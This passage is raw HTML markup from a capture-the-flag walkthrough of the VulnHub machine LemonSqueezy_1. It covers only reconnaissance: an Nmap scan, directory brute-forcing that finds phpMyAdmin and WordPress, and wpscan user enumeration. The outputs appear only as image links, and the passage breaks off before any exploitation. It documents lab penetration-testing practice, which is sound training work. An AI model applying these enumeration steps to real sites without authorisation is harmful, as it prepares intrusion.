/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;LemonSqueezy_1&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp; &lt;b&gt;LemonSqueezy_1&lt;/b&gt; can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/lemonsqueezy-1,473/&quot;&gt;https://www.vulnhub.com/entry/lemonsqueezy-1,473/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VMware:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhWJKXIp4YOiwqSnlUXWivJDZsaqm1C7_F6wc0SsE_Btvv_Mk4A0vXsIs3Yh2FApLMG8DW3UYdoitiw-qfhOGDJPPvGnWvKvBERuNE_0Ipll1X8CVctLj9fn3Hg5Xst0mh2OX5LTcxF2Dhux0ljlU8TjJe8U7049YsJa1cZyonhfluD3WXTWFov7kN1Vg&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;144&quot; data-original-width=&quot;322&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhWJKXIp4YOiwqSnlUXWivJDZsaqm1C7_F6wc0SsE_Btvv_Mk4A0vXsIs3Yh2FApLMG8DW3UYdoitiw-qfhOGDJPPvGnWvKvBERuNE_0Ipll1X8CVctLj9fn3Hg5Xst0mh2OX5LTcxF2Dhux0ljlU8TjJe8U7049YsJa1cZyonhfluD3WXTWFov7kN1Vg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span&gt;&lt;br /&gt;&lt;/span&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;2 - ENUMERATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj9ErWeLk5glOhr6us0u8QYU4NRArs3eFkHHawJGR0doqlifptl7LVDACGENvwLi8SCgTV-j9KS82-3m4-XZyYd7ujFbEISAI1Nk2duR8HMQRVmj6r52h7NmWlaGfi9EtTRXBs0HvnJ0TbkInK0E4VdSuERCwU8ID9hyxgxECqaEDyFZJuFFV_Ah_vxrg&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;220&quot; data-original-width=&quot;441&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj9ErWeLk5glOhr6us0u8QYU4NRArs3eFkHHawJGR0doqlifptl7LVDACGENvwLi8SCgTV-j9KS82-3m4-XZyYd7ujFbEISAI1Nk2duR8HMQRVmj6r52h7NmWlaGfi9EtTRXBs0HvnJ0TbkInK0E4VdSuERCwU8ID9hyxgxECqaEDyFZJuFFV_Ah_vxrg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Browsing the web server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEglHRzpoKcYB07_OHGmi25Gym7hCYHTFq4VUlzOJfd3tsBGbs_M6Qdh2t3SpIik-sH_dIGAPkJcWAKvghj9XHr41vMlf5LAiPViCePb9jZYxju4FVfNhNglV6qcZcR1kRc087ky3EblRtFvKPVYgI5RisdCJlRyTmcRk8fVv7rTHWo6tFnlblZGs2oCBA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;423&quot; data-original-width=&quot;828&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEglHRzpoKcYB07_OHGmi25Gym7hCYHTFq4VUlzOJfd3tsBGbs_M6Qdh2t3SpIik-sH_dIGAPkJcWAKvghj9XHr41vMlf5LAiPViCePb9jZYxju4FVfNhNglV6qcZcR1kRc087ky3EblRtFvKPVYgI5RisdCJlRyTmcRk8fVv7rTHWo6tFnlblZGs2oCBA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting the web server we find &lt;b&gt;/phpmyadmin&lt;/b&gt; and &lt;b&gt;/wordpress&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgf39NsmUA-jeI1D0LGFg7zTl0fZ_IHD5vlRnrRSO0aXri-pC6oK5sBHv4GfEzNhAnH5HwUJzf2LEQI3JK3v_Rv9Si1qATrgfSZlGdr1CbP_1bAOmtstvGWXn7GgB1hlU190mHJstV36sBz887PnSiZe1B_1CZcIzIXrkLFIA_zj2CDpg8YZTmZY-_0FQ&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;542&quot; data-original-width=&quot;655&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgf39NsmUA-jeI1D0LGFg7zTl0fZ_IHD5vlRnrRSO0aXri-pC6oK5sBHv4GfEzNhAnH5HwUJzf2LEQI3JK3v_Rv9Si1qATrgfSZlGdr1CbP_1bAOmtstvGWXn7GgB1hlU190mHJstV36sBz887PnSiZe1B_1CZcIzIXrkLFIA_zj2CDpg8YZTmZY-_0FQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;/phpmyadmin&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhwGDkToSaMHt-PMwP9Ez2OaCSKOsxUTOKxbetLhH-m_s_-j_yoFzm3bSaZGf4OgI6UNoqQPqRvk1b50AwKinLvaaQuZQx9TVwR6IIL95BmaEq4Oj8RaIcUppMvXY-YAkgmeOh8q5nZGnLyKMwQ8yH4Xo_vDIxN3RgBRfHAudkHOXZebrNeIk-PuhCi4w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;675&quot; data-original-width=&quot;548&quot; height=&quot;631&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhwGDkToSaMHt-PMwP9Ez2OaCSKOsxUTOKxbetLhH-m_s_-j_yoFzm3bSaZGf4OgI6UNoqQPqRvk1b50AwKinLvaaQuZQx9TVwR6IIL95BmaEq4Oj8RaIcUppMvXY-YAkgmeOh8q5nZGnLyKMwQ8yH4Xo_vDIxN3RgBRfHAudkHOXZebrNeIk-PuhCi4w=w512-h631&quot; width=&quot;512&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going to &lt;b&gt;/wordpress&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh5EZgiPL8rXuvBoROA2lD8ET6Xgi_xNfmrHxJvBM_XyfcnTuzrCXZQOF6NX9FuBWLbGlPMJpYe-8O7Gm2CcBtK0hH8_TRBpEwgZj15FpVIbT6fcJxXk-WDNDeoCqcg8OIWGm23PeuijPXZ4nRRiC628QwMVKHgbSjpqYqgln3Ri3PQ4q2ZNIfXgyYEqw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;807&quot; data-original-width=&quot;646&quot; height=&quot;666&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh5EZgiPL8rXuvBoROA2lD8ET6Xgi_xNfmrHxJvBM_XyfcnTuzrCXZQOF6NX9FuBWLbGlPMJpYe-8O7Gm2CcBtK0hH8_TRBpEwgZj15FpVIbT6fcJxXk-WDNDeoCqcg8OIWGm23PeuijPXZ4nRRiC628QwMVKHgbSjpqYqgln3Ri3PQ4q2ZNIfXgyYEqw=w533-h666&quot; width=&quot;533&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Editing &lt;b&gt;/etc/hosts&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj6auT0Xu_f7IP_HopmyxM38fk1Xf0dmXfXGwL0XfS9EP-iZ2X3qoLd8uZf-OG8DLotP0J00-IOwy4Ae4R49fxioP0_BUNm7NYU4RAK3F7akMbfSmD5oyFrwHkZRpYjF9T6RhgYKTE4ErKt0mHNt_cN8SeyVY_23Kx6uhEyEJaqSQlPvSqVDx9VN9YwsA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;75&quot; data-original-width=&quot;301&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj6auT0Xu_f7IP_HopmyxM38fk1Xf0dmXfXGwL0XfS9EP-iZ2X3qoLd8uZf-OG8DLotP0J00-IOwy4Ae4R49fxioP0_BUNm7NYU4RAK3F7akMbfSmD5oyFrwHkZRpYjF9T6RhgYKTE4ErKt0mHNt_cN8SeyVY_23Kx6uhEyEJaqSQlPvSqVDx9VN9YwsA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now &lt;b&gt;lemonsqueezy/wordpress&lt;/b&gt; presents the Wordpress webpage:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiZSrmrdkpoCVmQX-zhT1MfTk-__jMCqir-BGROkAMvJ_wy18OSwUxBPjZYREKH2bknS1MsImgbb9Hd88rK5y6qCKHceXiQpFfglr7Ee-6f_4pEWVg4ZHPlBCKONLoC81ttZDEunlctkzphN0tpDIMPLZLCFSRgzYSQHi6yQRQv7XfJJTL8Ikg79WlWig&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;739&quot; data-original-width=&quot;680&quot; height=&quot;590&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiZSrmrdkpoCVmQX-zhT1MfTk-__jMCqir-BGROkAMvJ_wy18OSwUxBPjZYREKH2bknS1MsImgbb9Hd88rK5y6qCKHceXiQpFfglr7Ee-6f_4pEWVg4ZHPlBCKONLoC81ttZDEunlctkzphN0tpDIMPLZLCFSRgzYSQHi6yQRQv7XfJJTL8Ikg79WlWig=w543-h590&quot; width=&quot;543&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Wpscan&lt;/b&gt; scans Wordpress, finding users &lt;b&gt;lemon&lt;/b&gt; and &lt;b&gt;orange&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgLR0pEvW4R2a2RiRLvhpHt5R9aD6TS0npJEniYx-Q7Ds-i-FV-HINs49_34ykAZYa1wWjDjklWlVEPodNjpCofA1RojWuR9opp-wTDfjw_6DBLkNDsjagrclFGfRxA-urb3ipBG2FnHRAvn-xbeBOLU8DlK7fOtkSBAw2WjaVlkVwbLjyY-zmqMEcu9g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;56&quot; data-original-width=&quot;585&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgLR0pEvW4R2a2RiRLvhpHt5R9aD6TS0npJEniYx-Q7Ds-i-FV-HINs49_34ykAZYa1wWjDjklWlVEPodNjpCofA1RojWuR9opp-wTDfjw_6DBLkNDsjagrclFGfRxA-urb3ipBG2FnHRAvn-xbeBOLU8DlK7fOtkSBAw2WjaVlkVwbLjyY-zmqMEcu9g=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh055tShYg3Sw8Nd5Y9yQnwtv-zhR_1-owRE3HxOMdMnDnHJG4iIDUCUL7gByElOT-wR_JNlIFAbT95T7YOGZjRLARFmI_IY9dJLq0GrmqAfhAyLiVS9SFWFY5mqO2WrKbXwhqpHAS9hdX3wFYaqU8mchHmzSqLAyNI-KSpLm_y0OxzTGMaW-HIHyBWAw&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;119&quot; data-original-width=&quot;820&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh055tShYg3Sw8Nd5Y9yQnwtv-zhR_1-owRE3HxOMdMnDnHJG4iIDUCUL7gByElOT-wR_JNlIFAbT95T7YOGZjRLARFmI_IY9dJLq0GrmqAfhAyLiVS9SFWFY5mqO2WrKbXwhqpHAS9hdX3wFYaqU8mchHmzSqLAyNI-KSpLm_y0OxzTGMaW-HIHyBWAw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiIJnmhfRZLPIKgfa7x0mTAfOkJ9SPlCS6E6IZEWMK4cLoug7dxFSU0u2wkQ53yOtfyS_Q-RPn_woeUyMp0nguxkMoqmoiJiAS28FAYC-mdefB5EDGv68T77orp00J5M82LWnIbM3yXvabPFbyFOUS-D_3dpCQlWt2xcxtDeyj0pJWgJPbo1BfmooPoGA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;408&quot; data-original-width=&quot;984&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiIJnmhfRZLPIKgfa7x0mTAfOkJ9SPlCS6E6IZEWMK4cLoug7dxFSU0u2wkQ53yOtfyS_Q-RPn_woeUyMp0nguxkMoqmoiJiAS28FAYC-mdefB5EDGv68T77orp00J5M82LWnIbM3yXvabPFbyFOUS-D_3dpCQlWt2xcxtDeyj0pJWgJPbo1BfmooPoGA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span 